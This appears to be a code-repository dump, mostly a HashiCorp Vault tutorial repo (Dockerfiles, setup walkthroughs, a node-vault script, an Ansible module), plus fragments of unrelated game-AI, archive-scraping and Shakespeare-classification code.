"text": "#include <iostream>\n#include \"util.h\"\n#include \"game.h\"\n#include \"types.h\"\n\nusing namespace std;\n\nbool getpos(Board board, int row, int col)\n{\n\tint shift = row * 8 + col;\n\treturn (board >> shift) & 1L;\n}\n\nvoid setpos(Board &board, int row, int col)\n{\n\tint shift = row * 8 + col;\n\tboard |= (1L << shift);\n}\n\n\nvoid print(Board board, Position playerA, Position playerB)\n{\n\n\t// print column header\n\tfor (int c = 0; c < kBoardSize; c++) {\n\t\tif (c==0)\n\t\t\tcout << \" \";\n\t\tcout << \" \" << c + 1;\n\t}\n\tcout << endl;\n\n\n\tfor (int r = 0; r < kBoardSize; r++) {\n\t\tcout << r + 1;\n\t\tfor (int c = 0; c < kBoardSize; c++) {\n\t\t\tcout << \" \";\n\t\t\tif (playerA.row == r && playerA.col == c)\n\t\t\t\tcout << kFirstSymbol;\n\t\t\telse if (playerB.row == r && playerB.col == c)\n\t\t\t\tcout << kSecondSymbol;\n\t\t\telse if (getpos(board, r, c))\n\t\t\t\tcout << '*';\n\t\t\telse\n\t\t\t\tcout << '-';\n\t\t}\n\t\tcout << endl;\n\t}\n}\n"
},
{
"alpha_fraction": 0.7186973690986633,
"alphanum_fraction": 0.7243121862411499,
"avg_line_length": 21.262500762939453,
"blob_id": "855c5bdfe1dc1f3043caabc476d67e8ae0297f91",
"content_id": "e31ba2e0ff0eb653b0b7f62a0b23aad973069fce",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 1781,
"license_type": "no_license",
"max_line_length": 107,
"num_lines": 80,
"path": "/isolation/src/player.h",
"repo_name": "koushikg14/ai",
"src_encoding": "UTF-8",
"text": "#ifndef PLAYER_H_\n#define PLAYER_H_\n\n#include <cassert>\n#include <iostream>\n#include <vector>\n#include <queue>\n#include <stdlib.h>\n\n#include \"game.h\"\n#include \"types.h\"\n#include \"table.h\"\n\nusing namespace std;\n\nclass Game;\n\nclass Player\n{\n protected:\n\tstring name_;\n public:\n\tPlayer(string name) {\n\t\tname_ = name;\n\t}\n\tvirtual ~Player() {}\n\n\tstring name() { return name_; }\n\tvirtual Position Move(Board board, Position my, Position her) = 0;\n};\n\n\nclass MyPlayer : public Player\n{\n private:\n\tstatic const int kDefaultMaxDepth = 5;\n\tstatic const unsigned int kMaxIsolationNodes = 100000;\n\t\n\tint kMaxDepth;\n\n\tdouble Eval(Board board, Position my, Position her);\n\tbool Cutoff(Board board, Position my, Position her, int depth);\n\n\tPosition AlphaBeta(Board board, Position my, Position her);\n\n\tScoreAction MaxValue(Board board, Position my, Position her,\n\t\t\t\t\t\t double alpha, double beta, int depth);\n\n\tScoreAction MinValue(Board board, Position my, Position her,\n\t\t\t\t\t\t double alpha, double beta, int depth);\n\n bool IsIsolated(Board board, Position my, Position her);\n\tint MaxClosure(Board board, Position cur);\n\tPosition LocalMove(Board board, Position my);\n\tint DoLocalMove(Board board, Position cur);\n\n\tTable table_;\n\n\tbool isolated_;\n\tint hersteps_;\n\n public:\n MyPlayer(string name) : Player(name), kMaxDepth(kDefaultMaxDepth), isolated_(false), hersteps_(IMAX) {}\n\n MyPlayer(string name, int maxDepth) : Player(name), kMaxDepth(maxDepth), isolated_(false), hersteps_(IMAX)\n\t{\n\t\tassert(maxDepth % 2 != 0);\n\t}\n\n\tvirtual Position Move(Board board, Position my, Position her);\n\n};\n\n\nBoard TryMove(Board board, Position cur, Direction dir, unsigned int nsteps);\nPosition MakeMove(Position cur, Action action);\nPosition RandomMove(Board board, Position current);\n\n\n#endif // PLAYER_H_\n"
},
{
"alpha_fraction": 0.580777108669281,
"alphanum_fraction": 0.5879345536231995,
"avg_line_length": 25.432432174682617,
"blob_id": "48b6e3fb3e0850aa05015074cd3a7dd79246bf79",
"content_id": "badc5ca8aaf9edc609ac93996cb8979e886db4a9",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 978,
"license_type": "no_license",
"max_line_length": 92,
"num_lines": 37,
"path": "/puzzle/test.py",
"repo_name": "koushikg14/ai",
"src_encoding": "UTF-8",
"text": "from puzzle import *\n\ndifficulty = 8\nrounds = 5\ngoal = parse_state(goal1)\nalgos = [bfs,dfs,idfs,uniform,astar, greedy, astar_lc, greedy_lc, astar_pattern]\n\nif __name__ == \"__main__\":\n train(goal)\n\n print \"Training finishes.\"\n \n # single round\n game = generate(goal, difficulty)\n solutions = [solve(game, goal, algo) for algo in algos]\n\n for solution in solutions:\n print solution\n\n print \"----------------\"\n \n # average performance\n stats = {}\n for algo in algos:\n stats[algo.__doc__] = [0,0,0,0]\n \n for i in range(rounds):\n game = generate(goal, difficulty)\n solutions = [solve(game, goal, algo) for algo in algos]\n for solution in solutions:\n stats[solution.algo] = [a+b for a,b in zip(stats[solution.algo],solution.stats)]\n\n for algo in stats.keys():\n stats[algo] = [x/rounds for x in stats[algo]]\n\n for algo, stat in stats.items():\n print algo + \":\" + str(stat)\n"
},
{
"alpha_fraction": 0.657182514667511,
"alphanum_fraction": 0.6592643857002258,
"avg_line_length": 16.573171615600586,
"blob_id": "d4c3868e8f61841c0e36278095996b22671a685d",
"content_id": "31ec963779aa31c035442fb4ce509ebc91759ab0",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 1441,
"license_type": "no_license",
"max_line_length": 65,
"num_lines": 82,
"path": "/isolation/src/types.h",
"repo_name": "koushikg14/ai",
"src_encoding": "UTF-8",
"text": "#ifndef TYPES_H_\n#define TYPES_H_\n\n#include <limits>\n\nconst double DMIN = std::numeric_limits<double>::min();\nconst double DMAX = std::numeric_limits<double>::max();\nconst double IMIN = std::numeric_limits<int>::min();\nconst double IMAX = std::numeric_limits<int>::max();\n\n\nstruct Position\n{\n\tint row;\n\tint col;\nPosition() : row(-1), col(-1) {}\nPosition(int r, int c) : row(r), col(c) {}\n};\n\n\ntypedef unsigned long Board;\n\nenum Direction {\n\tN,S,W,E,NW,NE,SW,SE,\n\tINVALID_DIR\n};\n\n\nstruct Action\n{\n\tDirection dir;\n\tint steps;\n\nAction(Direction d, int s) : dir(d), steps(s) {}\n};\n\nconst Action kInvalidAction = Action(INVALID_DIR, -1);\n\nstruct ScoreAction\n{\n\tdouble score;\n\tAction action;\nScoreAction(double s, Action act) : score(s), action(act) {}\n};\n\nbool inline operator==(const Position& lhs, const Position& rhs)\n{\n return lhs.row == rhs.row && lhs.col == rhs.col;\n}\n\nbool inline operator<(const Position& lhs, const Position& rhs)\n{\n\tif (lhs.row != rhs.row)\n\t\treturn lhs.row < rhs.row;\n\telse\n\t\treturn lhs.col < rhs.col;\n}\n\n\nstruct BfsNode\n{\n\tBoard board;\n\tPosition cur;\n\t\n\tint depth;\n\nBfsNode(Board b, Position pos) : board(b), cur(pos) {}\t\n\nBfsNode(Board b, Position pos, int d)\n: board(b), cur(pos), depth(d) {}\t\n};\n\nstruct BfsNodeCompare {\n\tbool operator() (const BfsNode& lhs, const BfsNode& rhs) const {\n\t\tif (lhs.board != rhs.board)\n\t\t\treturn lhs.board < rhs.board;\n\t\telse\n\t\t\treturn lhs.cur < rhs.cur;\n\t}\n};\n\n#endif // TYPES_H_\n"
}
] | 17 |
jcpowermac/vault-testing-doc | https://github.com/jcpowermac/vault-testing-doc | cdc32fec8e2311f25fe67c5eb69d7d49fd5c2948 | bf0eef0ceedb121f93fefb8374940b279dd4ec99 | 2f20057c6a5ce02134c42adfe264c7d97f2acba1 | refs/heads/master | 2020-12-25T15:17:56.815176 | 2016-06-27T20:48:15 | 2016-06-27T20:48:15 | 61,892,323 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.6468885540962219,
"alphanum_fraction": 0.6657018661499023,
"avg_line_length": 37.44444274902344,
"blob_id": "05c686fec37ed31df20be49f869303a6920b630d",
"content_id": "478fe0bbaabc215eacafb155b393179ad2daad4b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 691,
"license_type": "no_license",
"max_line_length": 94,
"num_lines": 18,
"path": "/example/node/vault.js",
"repo_name": "jcpowermac/vault-testing-doc",
"src_encoding": "UTF-8",
"text": "var options = {\n apiVersion: 'v1', // default\n endpoint: 'http://vault:8200', // default\n token: '1234' // client token; can be fetched after valid initialization of the server\n};\n\n// get new instance of the client\nvar vault = require(\"node-vault\")(options);\n\n// init vault server\nvault.init({ secret_shares: 5, secret_threshold: 3 }, function(err, result) {\n var keys = result.keys;\n vault.token = result.root_token;\n // unseal vault server\n vault.unseal({ secret_shares: 3, key: keys[0] }, function(err, result) {});\n vault.unseal({ secret_shares: 3, key: keys[1] }, function(err, result) {});\n vault.unseal({ secret_shares: 3, key: keys[2] }, function(err, result) {});\n});"
},
{
"alpha_fraction": 0.6936026811599731,
"alphanum_fraction": 0.7138047218322754,
"avg_line_length": 32,
"blob_id": "8bf16a9ae6010e771840ff3833df677d79777a72",
"content_id": "b5ec5b5a4eb076a32c52988b6e9f5fd82010fb58",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Dockerfile",
"length_bytes": 594,
"license_type": "no_license",
"max_line_length": 109,
"num_lines": 18,
"path": "/example/vault/Dockerfile",
"repo_name": "jcpowermac/vault-testing-doc",
"src_encoding": "UTF-8",
"text": "FROM centos\n\nRUN mkdir -p /opt/hashicorp/vault/bin/ && \\\n mkdir -p /var/opt/hashicorp/vault/ && \\\n mkdir -p /opt/hashicorp/vault/etc/policies && \\\n yum install -y unzip git wget vim epel-release && \\\n yum install -y python-pip python-devel && \\\n pip install hvac\n\nWORKDIR /opt/hashicorp/vault/bin/\nADD https://releases.hashicorp.com/vault/0.6.0/vault_0.6.0_linux_amd64.zip /opt/hashicorp/vault/bin/vault.zip\nRUN unzip vault.zip\n\nCOPY ansible.hcl /opt/hashicorp/vault/etc/policies\nCOPY vault.hcl /opt/hashicorp/vault/etc/\n\nCMD ./vault server -config ../etc/vault.hcl \nEXPOSE 8200\n"
},
{
"alpha_fraction": 0.6958333253860474,
"alphanum_fraction": 0.6986111402511597,
"avg_line_length": 19,
"blob_id": "dfab9797033325373d5a58549fc3c690b329106b",
"content_id": "d28680d8cb99e77767a7f6ebdf98e02a3b3a6dcc",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 720,
"license_type": "no_license",
"max_line_length": 96,
"num_lines": 36,
"path": "/2_create_policy.md",
"repo_name": "jcpowermac/vault-testing-doc",
"src_encoding": "UTF-8",
"text": "#### Vault Policy\nWe want to create a policy where users only have access to a specific location. \nThe policy below will force `ansible` users to only read/write in the `secret/ansible` location.\n\n[ansible.hcl](example/vault/ansible.hcl) \n\n```\npath \"secret/ansible/*\" {\n policy = \"write\"\n}\n\npath \"secret/ansible/*\" {\n policy = \"read\"\n}\n\npath \"auth/token/lookup-self\" {\n policy = \"read\"\n}\n```\n\nFirst we will auth using our root token\n```\n> $ ./vault auth e2ce682e-60b1-78c6-efc0-f444c0c3c6fc\nSuccessfully authenticated! You are now logged in.\ntoken: e2ce682e-60b1-78c6-efc0-f444c0c3c6fc\ntoken_duration: 0\ntoken_policies: [root]\n```\nNext create the policy\n```bash\n> $ ./vault policy-write ansible ansible.hcl\nPolicy 'ansible' written.\n```\n\n\n[Next](3_create_userpass.md)\n"
},
{
"alpha_fraction": 0.5778748393058777,
"alphanum_fraction": 0.5989810824394226,
"avg_line_length": 30.227272033691406,
"blob_id": "6dd3bf2a24d3e8b7d7d29c5cc36059540fd2b90d",
"content_id": "3b9c699a5aad38ee8a3cd57359b5512cb9da1b73",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 1377,
"license_type": "no_license",
"max_line_length": 211,
"num_lines": 44,
"path": "/4_write_read_example.md",
"repo_name": "jcpowermac/vault-testing-doc",
"src_encoding": "UTF-8",
"text": "#### Write and Read data\n\nUsing the root token lets create some dummy data\n```bash\n> $ ./vault write secret/foo value=bar\nSuccess! Data written to: secret/foo\n```\nAnd now that I have created a user for myself lets login with my jcallen account\n```bash\n> $ ./vault auth -method=userpass username=jcallen\nPassword (will be hidden):\nSuccessfully authenticated! You are now logged in.\nThe token below is already saved in the session. You do not\nneed to \"vault auth\" again with the token.\ntoken: cb370eaa-a9ec-6a53-0fe4-b08d08945313\ntoken_duration: 2591999\ntoken_policies: [ansible, default]\n```\n\nLet's try to read the data that root just wrote.\n```\n> $ ./vault read secret/foo [±master ●]\nError reading secret/foo: Error making API request.\n\nURL: GET http://172.17.0.3:8200/v1/secret/foo\nCode: 400. Errors:\n\n* permission denied\n```\nNo luck! Of course this was as intended.\n\nI should be able to write to `secret/ansible` lets try that\n```\n> $ ./vault write secret/ansible/foo value=bar\nSuccess! Data written to: secret/ansible/foo\n```\nAnd make sure we can read it too.\n```\n> $ ./vault read secret/ansible/foo\nKey Value\n--- -----\nrefresh_interval 2592000\nvalue bar\n```\n"
},
{
"alpha_fraction": 0.7385786771774292,
"alphanum_fraction": 0.7411167621612549,
"avg_line_length": 29.230770111083984,
"blob_id": "346d18feacc232f49fe65d2fdc36768a4a4553b3",
"content_id": "33af542eb6d7ba328f29d12034d06ada92dbbc83",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 394,
"license_type": "no_license",
"max_line_length": 88,
"num_lines": 13,
"path": "/3_create_userpass.md",
"repo_name": "jcpowermac/vault-testing-doc",
"src_encoding": "UTF-8",
"text": "\n#### Enable [userpass](https://www.vaultproject.io/docs/auth/userpass.html) auth backend\n```\n./vault auth-enable userpass\nSuccessfully enabled 'userpass' at 'userpass'!\n```\nOnce `userpass` is enabled we can create users\n```bash\n> $ ./vault write auth/userpass/users/jcallen password= policies=ansible\nSuccess! Data written to: auth/userpass/users/jcallen\n```\n\n\n[Next](4_write_read_example.md)\n"
},
{
"alpha_fraction": 0.7162162065505981,
"alphanum_fraction": 0.7267267107963562,
"avg_line_length": 40.625,
"blob_id": "ebf5532fb0248159fd4440f791ea06c90c7af429",
"content_id": "41b0c3202b7169de1607b89509dfbe8c557fabbf",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 669,
"license_type": "no_license",
"max_line_length": 71,
"num_lines": 16,
"path": "/notes.md",
"repo_name": "jcpowermac/vault-testing-doc",
"src_encoding": "UTF-8",
"text": "# Notes\n\n```\njcallen@silicon ~/Development/vault-testing-doc [13:05:05]\n> $ sudo docker run -it vault [±master ●]\nError initializing core: Failed to lock memory: cannot allocate memory\n\nThis usually means that the mlock syscall is not available.\nVault uses mlock to prevent memory from being swapped to\ndisk. This requires root privileges as well as a machine\nthat supports mlock. Please enable mlock on your system or\ndisable Vault from using it. To disable Vault from using it,\nset the `disable_mlock` configuration option in your configuration\nfile.\n```\n[Fix for above](https://github.com/cgswong/docker-vault/issues/4)\n"
},
{
"alpha_fraction": 0.7396449446678162,
"alphanum_fraction": 0.7869822382926941,
"avg_line_length": 27.33333396911621,
"blob_id": "df5f3d903faa1fcff4948b964808800549a219be",
"content_id": "eaa2c4a8781828e1ba64d6631011d36a93e2b1a9",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Dockerfile",
"length_bytes": 169,
"license_type": "no_license",
"max_line_length": 89,
"num_lines": 6,
"path": "/example/node/Dockerfile",
"repo_name": "jcpowermac/vault-testing-doc",
"src_encoding": "UTF-8",
"text": "FROM node:wheezy\nRUN /usr/local/bin/npm install node-vault && /usr/local/bin/npm install -g node-inspector\nCMD node-inspector\nEXPOSE 8080\nEXPOSE 5828\nCOPY vault.js /root"
},
{
"alpha_fraction": 0.6376021504402161,
"alphanum_fraction": 0.6376021504402161,
"avg_line_length": 26.524999618530273,
"blob_id": "ffa9fb3d54e309f049a93433191a4d5c0505ab06",
"content_id": "3c43672b5cc5142b4f5e12f8c5224c8ebcdcbe27",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1101,
"license_type": "no_license",
"max_line_length": 94,
"num_lines": 40,
"path": "/example/ansible/library/vault.py",
"repo_name": "jcpowermac/vault-testing-doc",
"src_encoding": "UTF-8",
"text": "try:\n import hvac\n HAS_HVAC = True\nexcept ImportError:\n HAS_HVAC = False\n\ndef create_argument_spec():\n\n argument_spec = dict()\n argument_spec.update(\n url=dict(required=True, type='str'),\n username=dict(required=True, aliases=['user', 'admin'], type='str'),\n password=dict(required=True, aliases=['pass', 'pwd'], type='str', no_log=True),\n path=dict(required=True, type='str')\n )\n return argument_spec\n\n\ndef main():\n argument_spec = create_argument_spec()\n module = AnsibleModule(argument_spec=argument_spec, supports_check_mode=False)\n\n if not HAS_HVAC:\n module.fail_json(msg=\"Hashicorp Vault Python library hvac required, please install.\") \n\n try:\n client = hvac.Client(url=module.params['url'])\n client.auth_userpass(module.params['username'], module.params['password'])\n results = client.read(module.params['path'])['data']\n\n module.exit_json(**results)\n except Exception as e:\n module.fail_json(msg=str(e))\n\n\nfrom ansible.module_utils.basic import *\n\n\nif __name__ == '__main__':\n main()\n"
},
{
"alpha_fraction": 0.6164483428001404,
"alphanum_fraction": 0.6819505095481873,
"avg_line_length": 23.74774742126465,
"blob_id": "eec2703429eeb3431d337fccfaa35ec595cbb84e",
"content_id": "1e687a6614d393d3a0ac6d22537a5937422c5b02",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 2748,
"license_type": "no_license",
"max_line_length": 135,
"num_lines": 111,
"path": "/1_initial_config.md",
"repo_name": "jcpowermac/vault-testing-doc",
"src_encoding": "UTF-8",
"text": "#### [Server Configuration](https://www.vaultproject.io/docs/config/index.html)\nFor more details see Hashicorp Vault documentation. Since we will only have a single node\nfile as a backend is sufficient.\n\n[vault.hcl](example/vault.hcl) \n---\n```\nbackend \"file\" {\n path = \"/var/opt/hashicorp/vault/\"\n}\n\nlistener \"tcp\" {\n address = \"0.0.0.0:8200\"\n tls_disable = 1\n}\n```\n\n#### Using Docker Compose\n```bash\n> $ cd example\n> $ sudo docker-compose run vault\n```\n\n#### Build Image and Run manually\n```bash\n> $ cd example/vault\n> $ sudo docker build -t vault .\n> $ sudo docker run -it --cap-add IPC_LOCK vault ```\n```\nSee [notes.md](notes.md) for more information regarding `--cap-add`.\n\n#### Using Docker Compose\n```bash\n> $ cd example\n> $ sudo docker-compose run vault\n```\n\n#### Immediate interactive results\n\n```\n==> Vault server configuration:\n\n Backend: file\n Listener 1: tcp (addr: \"0.0.0.0:8200\", tls: \"disabled\")\n Log Level: info\n Mlock: supported: true, enabled: true\n Version: Vault v0.6.0\n\n==> Vault server started! Log data will stream in below:\n```\n\nThe vault server is running in the container and I am running the client on my local machine.\nFirst we need to set an environmental variable.\n```bash\n> $ export VAULT_ADDR='http://172.17.0.3:8200'\n```\n#### vault init\nNext initialize the vault.\n```bash\n./vault init\n```\nTypically the unseal keys would be kept private but this is just an example. By default\nfive unseal keys are created.\n```\nUnseal Key 1: 19ba958fd12e7c15bc5e6f228e48a847d04447aba1773f233c4da031bb6589b601\nUnseal Key 2: 19d0d0fffd4668fd51b5e6380c49c6c8624393e5be1e35b9b7742260a57641b302\nUnseal Key 3: d8ee2daa090844e7b3076a2ce708e3462a68d4c4b2485e7a66b39154df10cfae03\nUnseal Key 4: 3a8c7c9a22f2bbc52dc6f1b211ac1fd3c4c449e0a7257c6ff8da5afb7f3b941304\nUnseal Key 5: fbb281cfd6bc97dfcf747da6faed3a5d8cef0ec1ab7317ac291de9cf055d1a0e05\nInitial Root Token: e2ce682e-60b1-78c6-efc0-f444c0c3c6fc\n\nVault initialized with 5 keys and a key threshold of 3. Please\nsecurely distribute the above keys. When the Vault is re-sealed,\nrestarted, or stopped, you must provide at least 3 of these keys\nto unseal it again.\n\nVault does not store the master key. Without at least 3 keys,\nyour Vault will remain permanently sealed.\n\n```\n\n#### vault unseal\n```\n./vault unseal\n```\nUnseal needs to be ran for at least three times in this example based on the current `key threshold`.\n\n```bash\n> $ ./vault unseal\nKey (will be hidden):\nSealed: true\nKey Shares: 5\nKey Threshold: 3\nUnseal Progress: 1\n\n> $ ./vault unseal\nKey (will be hidden):\nSealed: true\nKey Shares: 5\nKey Threshold: 3\nUnseal Progress: 2\n\n> $ ./vault unseal\nKey (will be hidden):\nSealed: false\nKey Shares: 5\nKey Threshold: 3\nUnseal Progress: 0\n```\n\n[Next](2_create_policy.md)\n\n"
},
{
"alpha_fraction": 0.7451403737068176,
"alphanum_fraction": 0.7559395432472229,
"avg_line_length": 37.58333206176758,
"blob_id": "c24e0d69fb22d80476eea4a98d5004b442ea8904",
"content_id": "f41478764eba29017f123422f81c5982fe78e43e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 463,
"license_type": "no_license",
"max_line_length": 128,
"num_lines": 12,
"path": "/README.md",
"repo_name": "jcpowermac/vault-testing-doc",
"src_encoding": "UTF-8",
"text": "# Hashicorp Vault testing \nHashicorp's [documentation](https://www.vaultproject.io/docs/) is already very good this repo is mostly for me and my teammates.\n\n\nI have broken the inital process into multiple markdown documents. [Start here](1_initial_config.md)\n\n#### TOC\n\n- [Initial Configuration](1_initial_config.md)\n- [Create Policy](2_create_policy.md)\n- [Create Username and Passwords](3_create_userpass.md)\n- [Write and Read example](4_write_read_example.md)\n"
},
{
"alpha_fraction": 0.7418032884597778,
"alphanum_fraction": 0.7418032884597778,
"avg_line_length": 53,
"blob_id": "866f7b7d147d48f819d0cab06b3f8ea5a2760bbe",
"content_id": "5c5cedfed4ce83dbd1453064f76f753ec0693040",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 488,
"license_type": "no_license",
"max_line_length": 90,
"num_lines": 9,
"path": "/ISSUES.md",
"repo_name": "jcpowermac/vault-testing-doc",
"src_encoding": "UTF-8",
"text": "#### Current questions, issues and concerns \n\n- Where do we store the unseal keys?\n- Need SSL certificate, how to generate?\n- Determine a process (where?) of init, unseal, enable `userpass` and importing the policy\n- Should this really be in a container? \n - If yes: Need an entrypoint script to take care of the start/stop process.\n - If no: Need to write a systemd unit file to start and stop the service.\n- Should another method of authentication should be used than userpass\n\n\n"
}
] | 11 |
jlwatson/cs224n-project | https://github.com/jlwatson/cs224n-project | 265f8e4c6c8ec8000d779328850216b989d10b2c | 34ecee1d675d6c5f2e0b6198d08284010832a499 | a41da95480b4936a04f9bfdde9c14511a275f28f | refs/heads/master | 2021-09-09T23:24:45.342350 | 2018-03-20T05:40:16 | 2018-03-20T05:40:16 | 123,238,048 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.5747074484825134,
"alphanum_fraction": 0.5792078971862793,
"avg_line_length": 26.774999618530273,
"blob_id": "06a205b43631373fe83ebee05b7a22dba2a41e88",
"content_id": "05402e9658da384f669e300a0d6e443b3b5d15d5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2222,
"license_type": "no_license",
"max_line_length": 103,
"num_lines": 80,
"path": "/data/satoshi/extract-cyp-author.py",
"repo_name": "jlwatson/cs224n-project",
"src_encoding": "UTF-8",
"text": "import click\nimport re\n\nfrom itertools import filterfalse\n\nMAIL_HEADER = re.compile('^From [email protected].*$', re.MULTILINE)\nMESSAGE_ID = re.compile('^Message-ID: <(.*)>$', re.MULTILINE)\nMESSAGE_FROM = re.compile('^From: (.*)$', re.MULTILINE)\n\nPGP_SIG_BEGIN = \"-----BEGIN PGP SIGNATURE-----\"\nPGP_SIG_END = \"-----END PGP SIGNATURE-----\"\n\nREMOVE_PREFIX = set(s.lower() for s in [\n 'From:',\n 'To:',\n 'Subject:',\n 'Bcc:',\n 'Message-ID:',\n '>',\n \"Hal Finney\",\n \"Nick Szabo\"\n])\n\nREMOVE_LINES = set(s.lower() for s in [\n \"[email protected]\",\n \"Distribution:\",\n \" CYPHERPUNKS >INTERNET:[email protected]\",\n \"[email protected]\",\n \"-----BEGIN PGP SIGNED MESSAGE-----\",\n \"Hal\",\n \"[email protected]\",\n \"David\",\n \"Thanks,\"\n])\n\ndef process_email(email):\n lines = email.splitlines()\n\n if PGP_SIG_BEGIN in lines and PGP_SIG_END in lines:\n lines = lines[:lines.index(PGP_SIG_BEGIN)] + lines[lines.index(PGP_SIG_END) + 1:]\n\n lines = filterfalse(lambda x: x.lower() in REMOVE_LINES, lines)\n lines = filterfalse(lambda x: any(x.lower().startswith(prefix) for prefix in REMOVE_PREFIX), lines)\n\n return '\\n'.join(lines).strip()\n\[email protected]()\[email protected]('--archive', type=click.File('r', encoding='latin-1'), required=True)\[email protected]('--author', required=True)\ndef extract_author(archive, author):\n \"\"\"Extract author's emails from Cypherpunk archive.\"\"\"\n\n author = author.lower()\n content = archive.read()\n mails = MAIL_HEADER.split(content)\n print(len(mails), \"mails in archive.\")\n\n for mail in mails:\n mail = mail.strip()\n if mail == \"\":\n continue\n\n message_id = MESSAGE_ID.search(mail).group(1)\n message_author = MESSAGE_FROM.search(mail).group(1).strip().lower()\n\n if message_author == author:\n try:\n header_end = mail.index('\\n\\n')\n except:\n print(\"Couldn't find content for message:\", message_id)\n continue\n\n content = process_email(mail[header_end:].strip())\n print(\"Saving message:\", message_id)\n with open(message_id + \".txt\", \"wb\") as f:\n f.write(content.encode('utf8'))\nif __name__ == '__main__':\n extract_author()\n\n74076\n"
},
{
"alpha_fraction": 0.5798499584197998,
"alphanum_fraction": 0.583065390586853,
"avg_line_length": 28.15625,
"blob_id": "ebc9c1011add4794bc327ed77f597178cb1c94d5",
"content_id": "8ff243543c3d9983eb77f3ca78322a293d0a6a24",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 933,
"license_type": "no_license",
"max_line_length": 91,
"num_lines": 32,
"path": "/data/satoshi/download-less-wrong.py",
"repo_name": "jlwatson/cs224n-project",
"src_encoding": "UTF-8",
"text": "import argparse\nimport os\nimport requests\nimport time\n\nfrom itertools import filterfalse\n\ndef process_comment(source):\n lines = source.splitlines()\n lines = filterfalse(lambda x: x.startswith('>'), lines)\n return '\\n'.join(lines)\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument('user', help='The Less Wrong user')\n args = parser.parse_args()\n\n last_id = \"\"\n while True:\n url = \"http://lesswrong.com/user/%s/comments/.json?after=%s\" % (args.user, last_id)\n print(\"Downloading\", url, \"...\")\n data = requests.get(url).json()['data']['children']\n\n if len(data) == 0:\n break\n\n for comment in data:\n with open('lesswrong-' + comment['data']['name'] + \".txt\", \"wb\") as f:\n f.write(process_comment(comment['data']['body']).encode('utf8'))\n last_id = comment['data']['name']\n\n time.sleep(1)\n"
},
{
"alpha_fraction": 0.5941384434700012,
"alphanum_fraction": 0.6057605147361755,
"avg_line_length": 36.524715423583984,
"blob_id": "dface4f9180a1cd85bad694952fe2b8cc70e4312",
"content_id": "45cec4ddc418edb9d7e0da6a2fb27ad1fd11a31b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 9895,
"license_type": "no_license",
"max_line_length": 156,
"num_lines": 263,
"path": "/shake-classification.py",
"repo_name": "jlwatson/cs224n-project",
"src_encoding": "UTF-8",
"text": "import argparse\nimport ast\nfrom collections import defaultdict\nimport hashlib\nimport json\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport os\nimport pickle\nimport random\nimport sklearn.metrics\nimport utils\n\nfrom mkdir_p import mkdir_p\n\nfrom keras.callbacks import ModelCheckpoint, EarlyStopping\nfrom keras.datasets import imdb\nfrom keras.layers import Dense, Embedding, LSTM, Dropout, Bidirectional, GRU\nfrom keras.models import Sequential\nfrom keras.preprocessing import sequence\nfrom keras.preprocessing.text import Tokenizer\nfrom keras.utils import plot_model\n\nfrom attention_layer import Attention\n\nBATCH_SIZE = 32\nSPLIT_FRACTION = 0.1\nTRAIN_EPOCHS = 5\n\nMIN_SEQUENCE_LEN = 10\nMAX_SEQUENCE_LEN = 100\n\nDISPUTED_FILE = 'data/shakespeare/disputed_works_75.data'\n\nRESULT_DIR = \"shake_results\"\n\nTOKENIZER_FILE = RESULT_DIR + \"/tokenizer.pickle\"\nWEIGHTS_FILE = RESULT_DIR + \"/shake-weights.hdf5\"\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument('data', help='Data file of (line, author, work) tuples. Use generate_data.py in data/shakespeare to generate new datasets.')\n parser.add_argument('--train', help='Run training.', action='store_true')\n parser.add_argument('--evaluate_test', help='Run evaluations on the test split.', action='store_true')\n parser.add_argument('--evaluate_val', help='Run evaluations on the val split.', action='store_true')\n parser.add_argument('--evaluate_disputed', help='Run model on disputed W.S. works.', action='store_true')\n args = parser.parse_args()\n\n mkdir_p(RESULT_DIR)\n\n if os.path.isfile(TOKENIZER_FILE):\n print(\"======= Loading Tokenizer =======\")\n with open(TOKENIZER_FILE, 'rb') as handle:\n tokenizer, data_tuples, author_id_map, works_id_map, lines_by_author_and_work = pickle.load(handle)\n\n else:\n print(\"======= Loading Plays =======\")\n print()\n\n with open(args.data, 'r') as data_handle:\n all_lines = [l.strip() for l in data_handle.readlines()]\n\n # strip \"// Metadata\", extract json metadata object, strip \"\\n // (<fields>)\"\n metadata = json.loads(all_lines[1])\n data = [ast.literal_eval(l) for l in all_lines[4:]]\n texts = [d[0] for d in data]\n\n authors = metadata[\"authors\"]\n works = metadata[\"works\"]\n\n # author_id -> author_name\n author_id_map = {a[1]: a[0] for a in authors}\n # work_id -> (work_name, author_id)\n works_id_map = {w[\"id\"]: (w[\"title\"], w[\"author\"]) for w in works}\n\n lines_by_author_and_work = {}\n for a in author_id_map.keys():\n lines_by_author_and_work[a] = defaultdict(list)\n\n for d in data:\n 